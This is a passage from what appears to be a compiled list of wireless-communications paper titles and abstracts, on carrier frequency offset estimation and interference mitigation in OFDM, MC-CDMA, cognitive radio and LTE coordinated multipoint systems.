as large frequency offsets for both single and multi-user systems in additive white Gaussian noise (AWGN) and Rayleigh fading channels. --- paper_title: Simplified Multiaccess Interference Reduction for MC-CDMA With Carrier Frequency Offsets paper_content: Multicarrier code-division multiple-access (MC-CDMA) system performance can severely be degraded by multiaccess interference (MAI) due to the carrier frequency offset (CFO). We argue that MAI can more easily be reduced by employing complex carrier interferometry (CI) codes. We consider the scenario with spread gain N, multipath length L, and N users, i.e., a fully loaded system. It is proved that, when CI codes are used, each user only needs to combat 2(L - 1) (rather than N - 1) interferers, even in the presence of CFO. It is shown that this property of MC-CDMA with CI codes in a CFO channel can be exploited to simplify three multiuser detectors, namely, parallel interference cancellation (PIC), maximum-likelihood, and decorrelating multiuser detectors. The bit-error probability (BEP) for MC-CDMA with binary phase-shift keying (BPSK) modulation and single-stage PIC and an upper bound for the minimum error probability are derived. Finally, simulation results are given to corroborate theoretical results. --- paper_title: MUI-Reducing Spreading Code Design for BS-CDMA in the Presence of Carrier Frequency Offset paper_content: Using mutually shift-orthogonal spreading codes, block-spread code-division multiple access (BS-CDMA) systems have been shown to achieve multiuser interference (MUI)-free reception when synchronization between the base station and the subscriber stations is achieved. In practice, when carrier frequency offset (CFO) is present, orthogonality among users is destroyed, and MUI occurs. This paper presents three methods of designing the spreading and despreading codes for uplink BS-CDMA systems to reduce MUI due to CFO. We show through rigorous derivation that all three codes can completely eliminate MUI due to CFO. In particular, by fixing the spreading codes at the transmitter, despreading codes that were obtained by minimizing the interference power or their cross correlation with the spreading codes are shown to yield a performance close to a synchronous system. The advantages and disadvantages of the BS-CDMA systems using the three proposed codes are discussed. --- paper_title: Total Inter-Carrier Interference Cancellation for MC-CDMA System in Mobile Environment paper_content: Multi-carrier code division multiple access (MC-CDMA)has been considered as a strong candidate for next generation wireless communication system due to its excellent performance in multi-path fading channel and simple receiver structure. However, like all the multi-carrier transmission technologies such as OFDM, the inter-carrier interference (ICI) produced by the frequency offset between the transmitter and receiver local oscillators or by Doppler shift due to high mobility causes significant BER (bit error rate) performance degradation in MC-CDMA system. Many ICI cancellation methods such as windowing and frequency domain coding have been proposed in the literature to cancel ICI and improve the BER performance for multi-carrier transmission technologies. However, existing ICI cancellation methods do not cancel ICI entirely and the BER performance after ICI cancellation is still much worse than the BER performance of original system without ICI. Moreover, popular ICI cancellation methods like ICI self-cancellation reduce ICI at the price of lowering the transmission rate and reducing the bandwidth efficiency. Other frequency-domain coding methods do not reduce the data rate, but produce less reduction in ICI as well. In this paper, we propose a novel ICI cancellation scheme that can eliminate the ICI entirely and offer a MC-CDMA mobile system with the same BER performance of a MC-CDMA system without ICI. More importantly, the proposed ICI cancellation scheme (namely Total ICI Cancellation) does not lower the transmission rate or reduce the bandwidth efficiency. Specifically, by exploiting frequency offset quantization, the proposed scheme takes advantage of the orthogonality of the ICI matrix and offers perfect ICI cancellation and significant BER improvement at linearly growing cost. Simulation results in AWGN channel and multi-path fading channel confirm the excellent performance of the proposed Total ICI Cancellation scheme in the presence of frequency offset or time variations in the channel, outperforming existing ICI cancellation methods. --- paper_title: Cluster-Based Differential Energy Detection for Spectrum Sensing in Multi-Carrier Systems paper_content: This paper presents a novel differential energy detection scheme for multi-carrier systems, which can form fast and reliable decision of spectrum availability even in very low signal-to-noise ratio (SNR) environment. For example, the proposed scheme can reach 90% in probability of detection (PD) and 10% in probability of false alarm (PFA) for the SNRs as low as -21 dB, while the observation length is equivalent to 2 multi-carrier symbol duration. The underlying initiative of the proposed scheme is applying order statistics on the clustered differential energy-spectral-density (ESD) in order to exploit the channel frequency diversity inherent in high data-rate communications. Specifically, to enjoy a good frequency diversity, the clustering operation is utilized to group uncorrelated subcarriers, while, the differential operation applied onto each cluster can effectively remove the noise floor and consequently overcome the impact of noise uncertainty while exploiting the frequency diversity. More importantly, the proposed scheme is designed to allow robustness in terms of both, time and frequency offsets. In order to analytically evaluate the proposed scheme, PFA and PD for Rayleigh fading channel are derived. The closed-form expressions show a clear relationship between the sensing performance and the cluster size, which is an indicator of the diversity gain. Moreover, we are able to observe up to 10 dB gain in the performance compared to the state-of-the-art spectrum sensing schemes. --- paper_title: Secondary Transceiver Design in the Presence of Frequency Offset between Primary and Secondary Systems paper_content: When both primary and secondary systems are orthogonal frequency division multiplexing modulated and are non-cooperative, carrier frequency offset between the systems is inevitable to cause harmful interference. In this paper, we jointly optimize secondary transceivers assuming that the frequency offset between the secondary transmitter (ST) and the primary receiver (PR) and different channel information from the ST to the PR are known at the ST. We first derive unified interference constraints and obtain the secondary transceivers minimizing the mean square error through convex optimization techniques. We then derive closed-form transceivers for several special cases to reveal the impact of the frequency offset on the secondary transceivers. We show that when there is no frequency offset between the ST and the PR, the optimal processing at the ST is power allocation. Otherwise, both power allocation and precoding are necessary. The impact of the frequency offset on the performance of both systems increases as the interference constraints become tighter and the bandwidth of the primary system becomes smaller. When the proposed transceivers are used, the performance of the secondary system is robust to the frequency offset and the performance of the primary system degrades little due to the remanent frequency offset. --- paper_title: Performance Analysis of Arbitrarily-Shaped Underlay Cognitive Networks: Effects of Secondary User Activity Protocols paper_content: This paper analyzes the performance of the primary users (PUs) and secondary users (SUs) in an arbitrarily-shaped underlay cognitive network. In order to meet the interference threshold requirement for a primary receiver at an arbitrary location, we consider different SU activity protocols that limit the number of active SUs. We propose a framework, based on the moment-generating function of the interference due to a random SU, to analytically compute the outage probability in the primary network, as well as the average number of active SUs in the secondary network. We also propose a cooperation-based SU activity protocol in the underlay cognitive network that includes the existing threshold-based protocol as a special case. We study the average number of active SUs for the different SU activity protocols, subject to a given outage probability constraint at the PU, and we employ it as an analytical approach to compare the effect of different SU activity protocols on the performance of the primary and secondary networks. --- paper_title: Breaking Spectrum Gridlock With Cognitive Radios: An Information Theoretic Perspective paper_content: Cognitive radios hold tremendous promise for increasing spectral efficiency in wireless systems. This paper surveys the fundamental capacity limits and associated trans- mission techniques for different wireless network design paradigms based on this promising technology. These para- digms are unified by the definition of a cognitive radio as an intelligent wireless communication device that exploits side information about its environment to improve spectrum utilization. This side information typically comprises knowl- edge about the activity, channels, codebooks, and/or messages of other nodes with which the cognitive node shares the spectrum. Based on the nature of the available side information as well as a priori rules about spectrum usage, cognitive radio systems seek to underlay, overlay, or interweave the cognitive radios' signals with the transmissions of noncognitive nodes. We provide a comprehensive summary of the known capacity characterizations in terms of upper and lower bounds for each of these three approaches. The increase in system degrees of freedom obtained through cognitive radios is also illuminated. This information-theoretic survey provides guidelines for the spectral efficiency gains possible through cognitive radios, as well as practical design ideas to mitigate the coexistence challenges in today's crowded spectrum. --- paper_title: A Low-Delay Low-Complexity EKF Design for Joint Channel and CFO Estimation in Multi-User Cognitive Communications paper_content: Parameter estimation in cognitive communications can be formulated as a multi-user estimation problem, which is solvable under maximum likelihood solution but involves high computational complexity. This paper presents a time-sharing and interference mitigation based EKF (Extended Kalman Filter) design for joint CFO (carrier frequency offset) and channel estimation at multiple cognitive users. The key objective is to realize low implementation complexity by decomposing high-dimensional parameters into multiple separate low-dimensional estimation problems, which can be solved in a time- shared manner via pipelining operation. We first present a basic EKF design that estimates the parameters from one TX user to one RX antenna. Then such basic design is time-shared and reused to estimate parameters from multiple TX users to multiple RX antennas. Meanwhile, we use interference mitigation module to cancel the co-channel interference at each RX sample. In addition, we further propose adaptive noise variance tracking module to improve the estimation performance. The proposed design enjoys low delay and low buffer size (because of its online real-time processing), as well as low implementation complexity (because of time-sharing and pipeling design). Its estimation performance is verified to be close to Cramer-Rao bound. --- paper_title: Sensing orthogonal frequency division multiplexing systems for cognitive radio with cyclic prefix and pilot tones paper_content: The detection of orthogonal frequency division multiplexing (OFDM) for cognitive radio is considered in this paper. A frequency-selective fading channel is considered and the receiving process is modeled with timing and frequency offsets. Firstly, the authors propose a new decision statistic based on time-domain cross-correlation of the cyclic prefix (CP) embedded in OFDM signals. The probability distribution functions (PDFs) of the statistics under both hypotheses of primary signal absence and presence are derived. Estimation of the timing and frequency offset is obtained through the maximum likelihood method and the received signals are modified. Then another new decision statistic based on frequency-domain cross-correlation of the pilot tones (PTs) is proposed whose PDF is also analyzed. Then, through the likelihood ratio test, the authors utilize CP and PT jointly and propose a global test statistic. The theoretical probabilities of false alarm (PFA) and detection are derived, and the theoretical threshold for any given PFA is proposed. The simulation results show that the proposed spectrum-sensing scheme has excellent performance, especially under very low signal-to-noise ratio (SNR). --- paper_title: Second-Order Cyclostationarity of Mobile WiMAX and LTE OFDM Signals and Application to Spectrum Awareness in Cognitive Radio Systems paper_content: Spectrum sensing and awareness are challenging requirements in cognitive radio (CR). To adequately adapt to the changing radio environment, it is necessary for the CR to detect the presence and classify the on-the-air signals. The wireless industry has shown great interest in orthogonal frequency division multiplexing (OFDM) technology. Hence, classification of OFDM signals has been intensively researched recently. Generic signals have been mainly considered, and there is a need to investigate OFDM standard signals, and their specific discriminating features for classification. In this paper, realistic and comprehensive mathematical models of the OFDM-based mobile Worldwide Interoperability for Microwave Access (WiMAX) and third-Generation Partnership Project Long Term Evolution (3GPP LTE) signals are developed, and their second-order cyclostationarity is studied. Closed-from expressions for the cyclic autocorrelation function (CAF) and cycle frequencies (CFs) of both signal types are derived, based on which an algorithm is proposed for their classification. The proposed algorithm does not require carrier, waveform, and symbol timing recovery, and is immune to phase, frequency, and timing offsets. The classification performance of the algorithm is investigated versus signal-to-noise ratio (SNR), for diverse observation intervals and channel conditions. In addition, the computational complexity is explored versus the signal type. Simulation results show the efficiency of the algorithm is terms of classification performance, and the complexity study proves the real time applicability of the algorithm. --- paper_title: Eigenvalue-Based Spectrum Sensing of Orthogonal Space-Time Block Coded Signals paper_content: We consider spectrum sensing of signals encoded with an orthogonal space-time block code (OSTBC). We propose a CFAR detector based on knowledge of the eigenvalue multiplicities of the covariance matrix which are inherent owing to the OSTBC and derive theoretical performance bounds. In addition, we show that the proposed detector is robust to a carrier frequency offset, and propose a detector that deals with timing synchronization using the detector for the synchronized case as a building block. The proposed detectors are shown numerically to perform well. --- paper_title: Software Defined Radio Implementation of SMSE Based Overlay Cognitive Radio in High Mobility Environment paper_content: A spectrally modulated spectrally encoded (SMSE) based overlay cognitive radio has been implemented and demonstrated in [1] via GNU software define radio (SDR). However, like most of the current cognitive radio implementations and demonstrations, this work does not consider the mobility between cognitive radio nodes. In a high mobility environment, the frequency offset introduced by Doppler shift leads to loss of the orthogonality among subcarriers. As a direct result, severe inter-carrier interference (ICI) and performance degradation is observed. In our previous work, we have proposed a new ICI cancellation method (namely Total ICI Cancellation) for OFDM [2] and MC-CDMA [3] mobile communication systems, which eliminates the ICI without lowering the transmission rate nor reducing the bandwidth efficiency. In this paper, we apply the total ICI cancellation algorithm onto the SMSE base overlay cognitive radio to demonstrate a high performance cognitive radio in high mobility environment. Specifically, we demonstrate an SMSE based overlay cognitive radio that is capable of detecting primary users in real time and adaptively adjusting its transmission parameters to avoid interference to (and from) primary users. When the primary user transmission changes, the cognitive radio dynamically adjusts its transmission accordingly. Additionally, this cognitive radio maintains seamless real time video transmission between the cognitive radio pair even when large frequency offset is introduced by mobility between CR transmitter and receiver. --- paper_title: Blind spectrum sensing in cognitive radio over fading channels and frequency offsets paper_content: This paper deals with the problem of spectrum sensing in cognitive radio. We consider a stochastic system model where the Primary User (PU) transmits a periodic signal over fading channels. The effect of frequency offsets due to oscillator mismatch, and Doppler offset is studied. We show that for this case the Likelihood Ratio Test (LRT) cannot be evaluated pointwise. We present a novel approach to approximate the marginilisation of the frequency offset using a single point estimate. This is obtained via a low complexity Constrained Adaptive Notch Filter (CANF) to estimate the frequency offset. Performance is evaluated via numerical simulations and it is shown that the proposed spectrum sensing scheme can achieve the same performance as the “near-optimal” scheme, that is based on a bank of matched filters, using only a fraction of the complexity required. --- paper_title: Carrier frequency offset estimation for non-contiguous OFDM receiver in cognitive radio systems paper_content: For non-contiguous (NC) OFDM based cognitive radio (CR) systems, schemes have been developed in literature to acquire spectrum synchronization information (SSI) with perfect carrier frequency offset (CFO) synchronization. However, OFDM is extremely sensitive to the CFO in practice, which leads to inter-carrier interference (ICI), hence degrading the spectrum synchronization performance for existing schemes. An accurate CFO estimation is therefore required before setting up the SSI. In this paper, we present a novel scheme based on the maximum likelihood (ML) algorithm to estimate the CFO for the NC-OFDM receiver when the SSI is unknown. A corresponding Cramer-Rao lower bound (CRB) with the ideal SSI is derived to demonstrate the efficiency of the proposed scheme. Simulation results show that the proposed scheme is robust against interference and achieves a satisfactory accuracy of estimation, which is close to the relevant CRB. --- paper_title: Optimizing Wideband Cyclostationary Spectrum Sensing Under Receiver Impairments paper_content: In the context of Cognitive Radios (CRs), cyclostationary detection of primary users (PUs) is regarded as a common method for spectrum sensing. Cyclostationary detectors rely on the knowledge of the signal's symbol rate, carrier frequency, and modulation class in order to detect the present cyclic features. Cyclic frequency and sampling clock offsets are the two receiver impairments considered in this work. Cyclic frequency offsets, which occur due to oscillator frequency offsets, Doppler shifts, or imperfect knowledge of the cyclic frequencies, result in computing the test statistic at an offset from the true cyclic frequency. In this paper, we analyze the effect of cyclic frequency offsets on conventional cyclostationary detection, and propose a new multi-frame test statistic that reduces the degradation due to cyclic frequency offsets. Due to the multi-frame processing of the proposed statistic, non-coherent integration might occur across frames. Through an optimization framework developed in this work that can be performed offline, we determine the best frame length that maximizes the average detection performance of the proposed cyclostationary detection method given the statistical distributions of the receiver impairments. As a result of the optimization, the proposed detectors is shown to achieve the performance gains over conventional detectors given the constrained sensing time. We derive the proposed detector's theoretical average detection performance, and compare it to the performance of the conventional cyclostationary detector. Our analysis shows that gains in average detection performance using the proposed method can be achieved when the effect of sampling clock offset is less severe than that of the cyclic frequency offset. The analysis given in this paper can be used as a design guideline for practical implementation of cyclostationary spectrum sensors. --- paper_title: Iterative Blind OFDM Parameter Estimation and Synchronization for Cognitive Radio Systems paper_content: An iterative design method for Orthogonal Frequency Division Multiplexing (OFDM) system parameter estimation and synchronization under a blind scenario for cognitive radio systems is proposed in this paper. A novel envelope spectrumbased arbitrary oversampling ratio estimator is presented first, based on which the algorithms are then developed to provide the identification of other OFDM parameters (number of subcarriers, cyclic prefix (CP) length). Carrier frequency offset (CFO) and timing offset are estimated for the purpose of synchronization with the help of the identified parameters. An iterative scheme is employed to increase the estimation accuracy. To validate the proposed design, the performance is evaluated under an experimental propagation environment and the results show that the proposed design is capable of adapting blind parameter estimation and synchronization for cognitive radio with improved performances. --- paper_title: Joint Frequency Synchronization and Spectrum Occupancy Characterization in OFDM-Based Cognitive Radio Systems paper_content: OFDM-based cognitive radio (CR) systems are shown to be an effective solution for increasing spectrum efficiency by activating the certain group of subcarriers (subbands) in locally available spectrum. However, each CR receiver should synchronize itself to appropriate carrier frequency and to identify currently activated subbands. Moreover, energy and bandwidth efficiency of CR systems can be improved if each CR could provide additional characterization of the local spectral content. In this paper a novel joint frequency synchronization and spectrum occupancy characterization method for OFDM-based CR systems is proposed. The synchronization preamble structure is appropriately modified in order to efficiently perform frequency offset estimation, to identify occupied subbands, and, finally, to provide SNR and interference power estimates as reliable quantitative indicators of spectrum occupancy. The performance of proposed method is evaluated for different amounts of spectrum occupancy and interference levels. --- paper_title: Spectrum Sensing for OFDM Signals Using Pilot Induced Auto-Correlations paper_content: Orthogonal frequency division multiplex (OFDM) has been widely used in various wireless communications systems. Thus the detection of OFDM signals is of significant importance in cognitive radio and other spectrum sharing systems. A common feature of OFDM in many popular standards is that some pilot subcarriers repeat periodically after certain OFDM blocks. In this paper, sensing methods for OFDM signals are proposed by using such repetition structure of the pilots. Firstly, special properties for the auto-correlation (AC) of the received signals are identified, from which the optimal likelihood ratio test (LRT) is derived. However, this method requires the knowledge of channel information, carrier frequency offset (CFO) and noise power. To make the LRT method practical, we then propose an approximated LRT (ALRT) method that does not rely on the channel information and noise power, thus the CFO is the only remaining obstacle to the ALRT. To handle the problem, we propose a method to estimate the composite CFO and compensate its effect in the AC using multiple taps of ACs of the received signals. Computer simulations have shown that the proposed sensing methods are robust to frequency offset, noise power uncertainty, time delay uncertainty, and frequency selectiveness of the channel. --- paper_title: Interference mitigation techniques for asynchronous multiple access communications in SIMO FBMC systems paper_content: In this paper we derive linear equalizers for FBMC systems. We focus on the multiple access channel where signals transmitted by different users may have different carrier frequency offsets and time delays. Aiming at reducing the bandwidth requirements of the periodic ranging messages we formulate two SIMO solutions that are tolerant to time and frequency misalignments. Simulation-based results show that the same performance can be achieved in the BER range [10−2, 10−4] in comparison to an OFDM multi-user minimum mean square error receiver. Considering a guard interval between users, the BER range in which FBMC and OFDM perform equally can be broadened. However, the OFDM solution requires a complexity 8.6 times higher and its spectral efficiency is reduced by 0.72 b/s/Hz due to the cyclic prefix. --- paper_title: Cooperative Space-Time Coded OFDM with Timing Errors and Carrier Frequency Offsets paper_content: The use of distributed space-time codes in cooperative communications promises to increase the rate and reliability of data transmission. These gains were mostly demonstrated for ideal scenarios, where all nodes are perfectly synchronized. Considering a cooperative uplink scenario with asynchronous nodes, the system suffers from two effects: timing errors and individual carrier frequency offsets. In effect, timing errors can completely cancel the advantages introduced by space-time codes, while individual carrier frequency offsets provide a great challenge to receivers. Indeed, frequency offsets are perceived as a time-variant channel (even if the individual links are static) in distributed cooperative communications. We show that using OFDM, space-time codes (STCs) become tolerant to timing errors. Channel estimation and tracking takes care of frequency offsets. Our simulations demonstrate that the bit error rate performance improves by an order of magnitude, when using a cooperative system design, which takes these two effects into account. --- paper_title: A Novel Initial Cell Search Scheme in TD-LTE paper_content: In LTE system, in order to access the network, user equipment (UE) should detect the primary synchronization signal (PSS) and secondary synchronization signal (SSS) in downlink (DL) signal from the surrounding base stations (BS). This paper presents a novel initial cell search (ICS) scheme in TD-LTE system that contains two steps. In the first step, modified normalization based PSS detection is proposed to combat carrier frequency offset (CFO) and uplink (UL) interference. After CFO estimation and compensation, coherent SSS detection is adopted in frequency domain in the second period. Furthermore, in order to combat channel fading and noise, a method of flexible combination of PSS and SSS within several frames is proposed. Simulation results demonstrate that the proposed scheme is more robust and effective than conventional approaches in TDD system. --- paper_title: A Simplified MMSE Equalizer for Distributed TR-STBC Systems with Multiple CFOs paper_content: In distributed wireless systems, the traditional carrier frequency offset (CFO) compensation methods may not be applied due to the existence of multiple CFOs. In this paper, we address the equalization issue for distributed time-reversal space-time block coded (TR-STBC) systems when multiple CFOs are presented. A simplified minimum mean-square error (MMSE) equalizer is proposed, which exploits the nearly-banded structure of the channel matrices and utilizes the {LDL}^H factorization to reduce the computational complexity. Simulation results show that the proposed equalizer can achieve the similar performance as the traditional MMSE equalizer while possessing much less complexity. --- paper_title: Simultaneous Multiple Carrier Frequency Offsets Estimation for Coordinated Multi-Point Transmission in OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) combined with the coordinated multi-point (CoMP) transmission technique has been proposed to improve performance of the receivers located at the cell border. However, the inevitable carrier frequency offset (CFO) will destroy the orthogonality between subcarriers and induce strong inter-carrier interference (ICI) in OFDM systems. In a CoMP-OFDM system, the impact of CFO is more severe because of the mismatch in carrier frequencies among multiple transmitters. To reduce performance degradation, CFO estimation and compensation is essential. For simultaneous estimation of multiple CFOs, the performance of conventional CFO estimation schemes is significantly degraded by the mutual interference among the signals from different transmitters. In this work, our goal is to propose an effective approach that can simultaneously estimate multiple CFOs in the downlink by using the composite signal coming from multiple base stations corresponding to CoMP transmission. Based on the Zadoff-Chu sequences, we design an optimal set of training sequences, which minimizes the mutual interference and is robust to the variations in multiple CFOs. Then, we propose a maximum likelihood (ML)-based estimator, the robust multi-CFO estimation (RMCE) scheme, for simultaneous estimation of multiple CFOs. In addition, by incorporating iterative interference cancellation into the RMCE scheme, we propose an iterative scheme to further improve the estimation performance. According to the simulations, our scheme can eliminate the mutual interference effectively, approaching the Cramer-Rao bound performance. --- paper_title: A Joint Channel and Frequency Offset Estimator for the Downlink of Coordinated MIMO-OFDM Systems paper_content: The issues of frequency offset and channel estimation are considered for the downlink of coordinated multiple-input multiple-output orthogonal frequency-division multiplexing systems. Multiple carrier frequency offsets exist in this coordinated system. Without implementing an appropriate compensation for these offsets, both inter-carrier and inter-cell interference will degrade the system performance. Here, we adopt a parallel interference cancelation strategy to iteratively mitigate inter-cell interference, and propose a frequency offset estimator, approximated by a Hadamard product and a Taylor series expansion, to eliminate the inter-carrier interference. Our scheme is significantly less complex than existing methods. Furthermore, the proposed channel estimator is robust to frequency offsets and performs comparably well to these conventional approaches. --- paper_title: An Enhanced Signal-Timing-Offset Compensation Algorithm for Coordinated Multipoint-to-Multiuser Systems paper_content: In coordinated multipoint-to-multiuser systems, since coordinated base stations (BSs) may transmit their signals simultaneously to multiple user equipments (UEs) and a UE may receive signals with different signal timing offsets (STOs) from different BSs at given time-slots and subcarriers, it is impossible for BSs to pre-compensate or for UEs to post-compensate the STOs as they do it in multipoint-to-user or point-to-multiuser systems, respectively. In this letter, we convince by demonstrations that the STOs cannot be completely eliminated by any compensation algorithm. In addition, we propose a novel STO compensation algorithm associated with tolerant residual STOs to minimize the STOs, and discuss in details how to calculate the pre-compensation vector at BSs. Simulation results indicate that the proposed algorithm is capable of mitigating the STOs effectively to tolerable values, and outperforms state of the art approaches. --- paper_title: Channel Estimation and Equalization for Asynchronous Single Frequency Networks paper_content: Single carrier frequency-domain equalization (SC-FDE) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper, we consider the use of SC-FDE schemes in broadcasting systems. A single frequency network transmission is assumed, and we study the impact of distinct carrier frequency offset (CFO) between the local oscillator at each transmitter and the local oscillator at the receiver. We propose an efficient method for estimating the channel frequency response and CFO associated to each transmitter and propose receiver structures able to compensate the equivalent channel variations due to different CFO for different transmitters. Our performance results show that we can have excellent performance, even when transmitters have substantially different frequency offsets. --- paper_title: Universal-filtered multi-carrier technique for wireless systems beyond LTE paper_content: In this paper, we propose a multi-carrier transmission scheme to overcome the problem of intercarrier interference (ICI) in orthogonal frequency division multiplexing (OFDM) systems. In the proposed scheme, called universal-filtered multi-carrier (UFMC), a filtering operation is applied to a group of consecutive subcarriers (e.g. a given allocation of a single user) in order to reduce out-of-band sidelobe levels and subsequently minimize the potential ICI between adjacent users in case of asynchronous transmissions. We consider a coordinated multi-point (CoMP) reception technique, where a number of base stations (BSs) send the received signals from user equipments (UEs) to a CoMP central unit (CCU) for joint detection and processing. We examine the impact of carrier frequency offset (CFO) on the performance of the proposed scheme and compare the results with the performance of cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems. We use computer experiments to illustrate the efficiency of the proposed multi-carrier scheme. The results indicate that the UFMC scheme outperforms the OFDM for both perfect and non-perfect frequency synchronization between the UEs and BSs. --- paper_title: Space-time coding for time and frequency asynchronous CoMP transmissions paper_content: This paper deals with time and frequency offset in coordinated multipoint (CoMP) transmission/reception networks by using distributed linear convolutional space-time coding (DLC-STC). We first prove that perfect time synchronization is impractical for CoMP transmission/reception networks. Then the DLC-STC scheme, in which exact time synchronization at the relay nodes is unnecessary, is proposed for the CoMP joint processing mode (CoMP-JP). Finally, we show the detecting method by minimum mean-squared error decision-feedback equalizer (MMSE-DFE) receivers with any frequency offsets. Simulation results show that with MMSE-DFE receivers, the proposed DLC-STC scheme outperforms the delay diversity scheme and the MMSE-DFE receivers can achieve the same diversity orders as the maximum likelihood sequence detection (MLSD) receivers. --- paper_title: Coordinated Multi-Cell Systems: Carrier Frequency Offset Estimation and Correction paper_content: We consider a coordinated multi-cell (CMC) system and the associated problem of independent carrier frequency offsets (CFOs) at the basestations (BSs). These BS CFOs cause accumulated phase errors that compromise downlink beamforming accuracy, and consequently degrade the spectral efficiency of the CMC system. Since the inherent structure of coordinated downlink beamforming techniques makes it impossible to correct for the BS CFOs at the mobile subscriber (MS), our topic is estimation and correction of the BS CFOs at the BSs. Our method begins with the formation of MS-side estimates of the BS CFOs, which are then fed back to the coordinated BSs. We then derive an optimum maximum likelihood (ML) estimator for the BS CFOs that uses independent MS-side CFO estimates and average channel signal-to-noise ratios. However, it is demonstrated that the CFOs of the MSs themselves introduce a bias to the optimal BS CFO estimator. To compensate for this bias, a joint BS and MS CFO estimator is derived, but shown both to require high computation and have rank deficiency. This motivates an improved technique that removes the rank problem and employs successive estimation to reduce computation. It is demonstrated to overcome the MS CFO bias and efficiently solve the joint BS and MS CFO problem in systems that have low to moderate shadowing. We term the full BS CFO estimation and correction procedure "BS CFO tightening". --- paper_title: Low-Complexity Semiblind Multi-CFO Estimation and ICA-Based Equalization for CoMP OFDM Systems paper_content: We propose a low-complexity semiblind structure with multiple-carrier-frequency-offset (CFO) estimation and independent component analysis (ICA)-based equalization for multiuser coordinated multipoint (CoMP) orthogonal frequency-division-multiplexing (OFDM) systems. A short pilot is carefully designed for each user and has a twofold advantage. On the one hand, using the pilot structure, a complex multidimensional search for multiple CFOs is divided into a number of low-complexity monodimensional searches. On the other hand, the cross correlations between the transmitted and the received pilots are explored to allow simultaneous elimination of permutation ambiguity and quadrant ambiguity in the ICA equalized signals. Simulation results show that with a low training overhead of 1.6%, the proposed semiblind system not only outperforms the existing multi-CFO estimation schemes in terms of bit error rate (BER) and mean square error (MSE) of multi-CFO estimation but achieves a BER performance close to the ideal case with perfect channel state information (CSI) and no CFO at the receiver as well. --- paper_title: Estimation of Time and Frequency Offsets in LTE Coordinated Multi-Point Transmission paper_content: We address the impact, estimation and compensation of time and frequency offsets in LTE CoMP. In LTE CoMP, transmissions may come from a different transmission point in every subframe of one millisecond. Due to propagation delay differences and time-frequency synchronization imperfections between the transmission points, the user equipment (UE) receiver is thus exposed to different time- frequency offsets in every subframe. In this paper we illustrate both analytically and numerically the impact of these time and frequency offsets on channel estimation performance and finally on LTE CoMP link-level demodulation performance. Furthermore, we study the applicability of existing LTE reference signals to the time-frequency offset estimation problem. In particular we compare two approaches in which the UE is either aware or unaware of the exact transmission point. Finally, we show with LTE link-level simulations that using the proposed approaches the impacts of time-frequency offsets can be almost perfectly compensated. --- paper_title: Coordinated multipoint transmission and reception in LTE-advanced: deployment scenarios and operational challenges paper_content: 3GPP has completed a study on coordinated multipoint transmission and reception techniques to facilitate cooperative communications across multiple transmission and reception points (e.g., cells) for the LTE-Advanced system. In CoMP operation, multiple points coordinate with each other in such a way that the transmission signals from/to other points do not incur serious interference or even can be exploited as a meaningful signal. The goal of the study is to evaluate the potential performance benefits of CoMP techniques and the implementation aspects including the complexity of the standards support for CoMP. This article discusses some of the deployment scenarios in which CoMP techniques will likely be most beneficial and provides an overview of CoMP schemes that might be supported in LTE-Advanced given the modern silicon/DSP technologies and backhaul designs available today. In addition, practical implementation and operational challenges are discussed. We also assess the performance benefits of CoMP in these deployment scenarios with traffic varying from low to high load. --- paper_title: Feedback Generation for CoMP Transmission in Unsynchronized Networks with Timing Offset paper_content: Coordinated multipoint (CoMP) transmission is a promising technique in long term evolution (LTE) systems to provide coverage and broadband communication for cell edge user equipments (UEs). However, as signals from multiple transmitters may reach the UE at different times, CoMP networks might experience high time offsets, leading to significant performance loss in closed-loop transmission. In this paper we show that spacing between reference signals (RSs) imposes a phase offset on the transmit covariance matrix in presence of timing offset (TO), affecting the feedback generation. The promised advantages of closed-loop CoMP transmission vanish in presence of TO due to improper precoding matrix index (PMI) selection. Keeping the phase shift close to zero, reliable PMI selection can be guaranteed and as a result near optimum performance is achieved for closed-loop CoMP transmission in unsynchronized networks with TO present. --- paper_title: Efficient Phase-Error Suppression for Multiband OFDM-Based UWB Systems paper_content: This paper proposes an efficient phase-error suppression scheme for multiband (MB) orthogonal frequency-division multiplexing (OFDM)-based ultrawideband (UWB) communication systems. The proposed scheme consists of a clock-recovery loop and a common phase-error (CPE) tracking loop. The clock-recovery loop performs estimation of the sampling frequency offset (SFO) and its 2-D (time and frequency) compensation, while the CPE tracking loop estimates and corrects the phase errors caused by residual carrier frequency offset (CFO), residual SFO, and phase noise (PHN). The SFO and CPE estimators employ pilot-tone-based and channel-frequency-response (CFR)-weighted low-complexity approaches, each of which uses a robust error-reduction scheme without using angle calculations or divisions. Analytical results and numerical examples show the effectiveness of the proposed scheme in different multipath fading scenarios and signal-to-noise ratio (SNR) regimes. --- paper_title: A non-coherent neighbor cell search scheme for LTE/LTE-A systems paper_content: A new neighbor cell search algorithm for LTE/LTE-A systems is presented in this paper. To improve the interference problem in channel estimation for coherent SSS detection in the conventional neighbor cell search approaches, we propose a non-coherent scheme that takes advantage of the similarity of channel responses at adjacent subcarriers. The proposed neighbor cell search procedure not only includes both PSS and SSS detection, but also can combat different carrier frequency offsets that the home cell signal and the neighbor cell signal may suffer. The removal of the home cell synchronization signals in our algorithm converts the neighbor cell PSS and SSS into new sequences for recognition, respectively. By examining the cross-correlation properties of the new sequences, we show that partial correlation can well detect the neighbor cell sector ID and group ID through the new sequences. From simulation results, it is also clear that the proposed algorithm has good detection results and outperforms the conventional coherent approaches. --- paper_title: Sequence Designs for Interference Mitigation in Multi-Cell Networks paper_content: We propose a training sequence that can be used at the handshaking stage for multi-cell networks. The proposed sequence is theoretically proved to enjoy several nice properties including constant amplitude, zero autocorrelation, and orthogonality in multipath channels. Moreover, the analytical results show that the proposed sequence can greatly reduce the multi-cell interference (MCI) induced by carrier frequency offset (CFO) to a negligible level. Therefore, the CFO estimation algorithms designed for single-user or single-cell environments can be slightly modified, and applied in multi-cell environments; an example is given for showing how to modify the estimation algorithms. Consequently, the computational complexity can be dramatically reduced. Simulation results show that the proposed sequences and the CFO estimation algorithms outperform conventional schemes in multi-cell environments. --- paper_title: Resource Block Basis MMSE Beamforming for Interference Suppression in LTE Uplink paper_content: This paper proposes a new method to suppress interference using antenna array for LTE uplink. The proposed method does not require knowledge on resource allocation of either interfering or communicating mobile stations, and thus it has a significant advantage of ease of implementation. An additional advantage of this method is parallelization and scalability for multi-core processing. This paper also proposes a novel iterative timing offset compensation to enable 